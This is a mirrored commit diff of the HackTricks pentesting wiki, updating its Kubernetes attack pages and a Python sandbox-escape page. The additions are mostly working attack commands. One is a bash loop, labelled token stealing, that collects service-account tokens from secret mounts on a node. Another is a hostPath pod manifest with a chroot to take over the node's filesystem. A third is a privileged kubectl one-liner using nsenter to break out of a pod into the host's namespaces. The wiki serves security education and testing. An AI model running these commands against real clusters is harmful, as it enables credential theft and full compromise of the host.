mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-14 17:07:34 +00:00
GitBook: [#2911] No subject
This commit is contained in:
parent
086406e0d1
commit
8a0c6374c5
5 changed files with 98 additions and 36 deletions
|
@ -830,31 +830,7 @@ f(42)
|
||||||
|
|
||||||
## Decompiling Compiled Python
|
## Decompiling Compiled Python
|
||||||
|
|
||||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
|
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code
|
||||||
|
|
||||||
**Check out this tutorial**:
|
|
||||||
|
|
||||||
{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
|
|
||||||
[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
|
|
||||||
{% endcontent-ref %}
|
|
||||||
|
|
||||||
## Misc Python
|
|
||||||
|
|
||||||
### Assert
|
|
||||||
|
|
||||||
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
|
|
||||||
Therefore, checks like
|
|
||||||
|
|
||||||
```python
|
|
||||||
def check_permission(super_user):
|
|
||||||
try:
|
|
||||||
assert(super_user)
|
|
||||||
print("\nYou are a super user\n")
|
|
||||||
except AssertionError:
|
|
||||||
print(f"\nNot a Super User!!!\n")
|
|
||||||
```
|
|
||||||
|
|
||||||
will be bypassed 
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
@ -863,4 +839,3 @@ will be bypassed 
|
||||||
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
|
* [https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/](https://blog.delroth.net/2013/03/escaping-a-python-sandbox-ndh-2013-quals-writeup/)
|
||||||
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
|
* [https://gynvael.coldwind.pl/n/python\_sandbox\_escape](https://gynvael.coldwind.pl/n/python\_sandbox\_escape)
|
||||||
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
|
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
|
||||||
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
|
|
||||||
|
|
|
@ -48,3 +48,7 @@ Another important details about enumeration and Kubernetes permissions abuse is
|
||||||
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
|
[hardening-roles-clusterroles.md](hardening-roles-clusterroles.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Labs to practice and learn
|
||||||
|
|
||||||
|
* [https://securekubernetes.com/](https://securekubernetes.com)
|
||||||
|
* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html)
|
||||||
|
|
|
@ -20,14 +20,6 @@ You can check this **docker breakouts to try to escape** from a pod you have com
|
||||||
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
|
[docker-breakout](../../linux-unix/privilege-escalation/docker-breakout/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
If you managed to escape from the container there are some interesting things you will find in the node:
|
|
||||||
|
|
||||||
* The **Kubelet** service listening
|
|
||||||
* The **Kube-Proxy** service listening
|
|
||||||
* The **Container Runtime** process (Docker)
|
|
||||||
* More **pods/containers** running in the node you can abuse like this one (more tokens)
|
|
||||||
* The whole **filesystem** and **OS** in general
|
|
||||||
|
|
||||||
### Abusing Kubernetes Privileges
|
### Abusing Kubernetes Privileges
|
||||||
|
|
||||||
As explained in the section about **kubernetes enumeration**:
|
As explained in the section about **kubernetes enumeration**:
|
||||||
|
@ -94,3 +86,34 @@ In case the **compromised pod is running some sensitive service** where other po
|
||||||
## Automatic Tools
|
## Automatic Tools
|
||||||
|
|
||||||
* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
|
* [https://github.com/inguardians/peirates](https://github.com/inguardians/peirates)
|
||||||
|
|
||||||
|
## Node Post-Exploitation
|
||||||
|
|
||||||
|
If you managed to **escape from the container** there are some interesting things you will find in the node:
|
||||||
|
|
||||||
|
* The **Container Runtime** process (Docker)
|
||||||
|
* More **pods/containers** running in the node you can abuse like this one (more tokens)
|
||||||
|
* The whole **filesystem** and **OS** in general
|
||||||
|
* The **Kube-Proxy** service listening
|
||||||
|
* The **Kubelet** service listening: Check `/var/lib/kubelet/` specially `/var/lib/kubelet/kubeconfig`
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Check Kubelet privileges
|
||||||
|
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
|
||||||
|
|
||||||
|
# Steal the tokens from the pods running in the node
|
||||||
|
## The most interesting one is probably the one of kube-system
|
||||||
|
ALREADY="IinItialVaaluE"
|
||||||
|
for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
|
||||||
|
TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
|
||||||
|
if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
|
||||||
|
ALREADY="$ALREADY|$TOKEN"
|
||||||
|
echo "Directory: $i"
|
||||||
|
echo "Namespace: $(cat $i)"
|
||||||
|
echo ""
|
||||||
|
echo $TOKEN
|
||||||
|
echo "================================================================================"
|
||||||
|
echo ""
|
||||||
|
fi
|
||||||
|
done
|
||||||
|
```
|
||||||
|
|
|
@ -377,7 +377,15 @@ https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/apis/batch/v1bet
|
||||||
{% endtab %}
|
{% endtab %}
|
||||||
{% endtabs %}
|
{% endtabs %}
|
||||||
|
|
||||||
****
|
### **Get Pods consumptions**
|
||||||
|
|
||||||
|
{% tabs %}
|
||||||
|
{% tab title="kubectl" %}
|
||||||
|
```
|
||||||
|
./kubectl top pod --all-namespaces
|
||||||
|
```
|
||||||
|
{% endtab %}
|
||||||
|
{% endtabs %}
|
||||||
|
|
||||||
### Escaping from the pod
|
### Escaping from the pod
|
||||||
|
|
||||||
|
|
|
@ -91,7 +91,7 @@ So just create the malicious pod and expect the secrets in port 6666:
|
||||||
|
|
||||||
![](<../../.gitbook/assets/image (464).png>)
|
![](<../../.gitbook/assets/image (464).png>)
|
||||||
|
|
||||||
### **Pod Creation - Mount Root (pod escape)**
|
### **Pod Creation & Escape - Mount Root**
|
||||||
|
|
||||||
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
|
Having Pod create permissions over kube-system you can also be able to mount directories from the node hosting the pods with a pod template like the following one:
|
||||||
|
|
||||||
|
@ -125,6 +125,58 @@ kubectl --token $token create -f mount_root.yaml
|
||||||
|
|
||||||
And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
|
And capturing the reverse shell you can find the `/` directory (the entire filesystem) of the node mounted in `/mnt` inside the pod.
|
||||||
|
|
||||||
|
**Instead of getting a reverse shell you might just wanto to execute a pod using kubectl with the filesystem mounted and get a shell on it:**
|
||||||
|
|
||||||
|
1. Create a "hostpath volume mount" `pod` manifest.
|
||||||
|
|
||||||
|
```
|
||||||
|
cat > hostpath.yml <<EOF
|
||||||
|
---
|
||||||
|
apiVersion: v1
|
||||||
|
kind: Pod
|
||||||
|
metadata:
|
||||||
|
name: hostpath
|
||||||
|
spec:
|
||||||
|
containers:
|
||||||
|
- name: hostpath
|
||||||
|
image: busybox:latest
|
||||||
|
command:
|
||||||
|
- sleep
|
||||||
|
- "86400"
|
||||||
|
volumeMounts:
|
||||||
|
- name: rootfs
|
||||||
|
mountPath: /rootfs
|
||||||
|
restartPolicy: Always
|
||||||
|
volumes:
|
||||||
|
- name: rootfs
|
||||||
|
hostPath:
|
||||||
|
path: /
|
||||||
|
EOF
|
||||||
|
```
|
||||||
|
2. Create the `pod` that mounts the host filesystem's `/` at `/rootfs` inside the container.
|
||||||
|
|
||||||
|
```
|
||||||
|
kubectl apply -f hostpath.yml
|
||||||
|
```
|
||||||
|
3. Use `kubectl exec` to get a shell inside the `hostpath` `pod` in the `default` `namespace`.
|
||||||
|
|
||||||
|
```
|
||||||
|
kubectl exec -it hostpath /bin/sh
|
||||||
|
```
|
||||||
|
4. Use the `chroot` command to switch the filesystem root to the `/rootfs` of the container and run a `bash` shell.
|
||||||
|
|
||||||
|
```
|
||||||
|
chroot /rootfs /bin/bash
|
||||||
|
```
|
||||||
|
|
||||||
|
### Pod Creation & Escape - Get into root pid ns
|
||||||
|
|
||||||
|
From [this tweet](https://twitter.com/mauilion/status/1129468485480751104) you can find a way to escape from the pod and get inside the root ns
|
||||||
|
|
||||||
|
```bash
|
||||||
|
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
|
||||||
|
```
|
||||||
|
|
||||||
### Sniffing **with a sidecar proxy app**
|
### Sniffing **with a sidecar proxy app**
|
||||||
|
|
||||||
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
|
By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod.
|
||||||
|
|
Loading…
Reference in a new issue